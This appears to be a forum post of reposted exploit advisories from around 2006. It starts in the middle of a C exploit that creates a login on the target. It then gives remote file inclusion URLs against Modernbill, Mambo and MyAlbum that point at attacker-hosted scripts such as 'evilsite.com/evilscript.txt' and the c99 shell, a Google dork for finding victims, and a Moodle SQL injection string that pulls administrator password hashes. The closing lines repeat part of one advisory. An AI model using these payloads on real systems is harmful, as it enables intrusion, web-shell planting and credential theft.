{ bytes_read = recv(sockfd, buffer, sizeof(buffer), 0); if ( bytes_read > 0 ) printf("%s", buffer); } while ( bytes_read > 0 ); */ printf("Exploit Sent to [%s] \n Login with Username: %s (lowercase) \n Password: 1234\n", hostname, strlwr(argv[2])); printf("Any Questions/Comments/Concerns ==> GLinares.Code [at] Gmail [dot] com\n"); WSACleanup(); return 0; } micimacko(HCE) Modernbill <= 1.6 (config.php) Remote File Include Vulnerability Code: #############################SolpotCrew Community################################ # # modernbill ver 1.6 (DIR) Remote File Inclusion # # Download file : http://freshmeat.net/projects/modernbill/ # ################################################################## ############### # # # Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006) # # contact: chris_hasibuan@yahoo.com # # Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt # ################################################################## ############## # # # Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja , # L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy # home_edition2001 , Rendy ,Tje , m3lky , no-profile , bYu # and all crew #mardongan @ irc.dal.net # # ################################################################## ############# Input passed to the "DIR" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. code from include/html/config.php //include($DIR."include/misc/mod_sessions/session_functions.inc.php"); #session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_mysql _write","sess_mysql_destroy","sess_mysql_gc"); //session_start(); session_register("set_language"); session_register("v"); $new_language = ($set_language) ? $set_language : NULL ; $signup_form = TRUE; include_once($DIR."include/functions.inc.php"); ## ## DO NOT CHANGE STOP ## google dork : allinurl:/modernbill/ exploit: http://somehost/modernbill/include/html/config.php?DIR=http://evilcode ##############################MY LOVE JUST FOR U RIE######################### ######################################E.O.F######################## ########## # milw0rm.com [2006-08-07] vns3curity(HCE) moodle 1.6.2 SQL injection Code: Topic : SQL injection - moodle 1.6.2 SecurityAlert Id : 1699 CVE : CVE-2006-5219 SecurityRisk : Medium Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : disfigure (disfigure gmail com) Date : 12.10.2006 Affected Software : moodle 1.6.2 Advisory Text : /****************************************/ http://www.w4cking.com Product: moodle 1.6.2 http://www.moodle.org Vulnerability: SQL injection Notes: - SQL injection can be used to obtain password hash - the moodle blog "module" must be enabled - guest access to the blog must be enabled POC: <target>/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527- 1%20UNION%20 SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password ,email%20FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20O N%20mdl_use r.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1 ,1 ,1,1,1,1,1,1,1%20FROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%2 0md l_user%20u%20WHERE%201%3D0%2527,1,1,%25271 Black_hat_cr(HCE) MosReporter Mambo-Component Remote File Include Vulnerability ~#http://www.example.com/[path_to_mambo]/modules/MambWeather/Savant2/Sa vant2_Plugin_options.php?mosConfig_absolute_path =c99 Black_hat_cr(HCE) MyAlbum <= 3.02 (langs_dir) Remote File Inclusion Vulnerability #Vulnerable Code : # # # include($langs_dir."/messages.".$lang.".php"); ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++= # #Exploit : # # #http://sitename.com/[MyAlbum_DIR]/language.inc.php?langs_dir=http://evilsite. com/evilscript.txt? #Discoverd By : Silahsiz Kuvvetler The TURKISH DEVELOPER Black_hat_cr(HCE) MyAlbum <= 3.02 (language.inc.php) Remote File Inclusion Vulnerability PHP Code: #========================================================== ==================================== #MyAlbum <= 3.02 (langs_dir) Remote File Inclusion Vulnerability #========================================================== ===================================== # #Critical Level : hm i think # #Script Dowload : http://www.comscripts.com/jump.php?action=script&id=1731 # #Version : 3.XX (maybe others ) # #========================================================== ====================================== # #Bug in : # #./language.inc.php #========================================================== ====================================== . ################################################################## ############### # # # Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006) # # contact: chris_hasibuan@yahoo.com # # Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt # ################################################################## ##############. <= 1.6 (config.php) Remote File Include Vulnerability Code: #############################SolpotCrew Community################################ # # modernbill ver 1.6 (DIR) Remote File Inclusion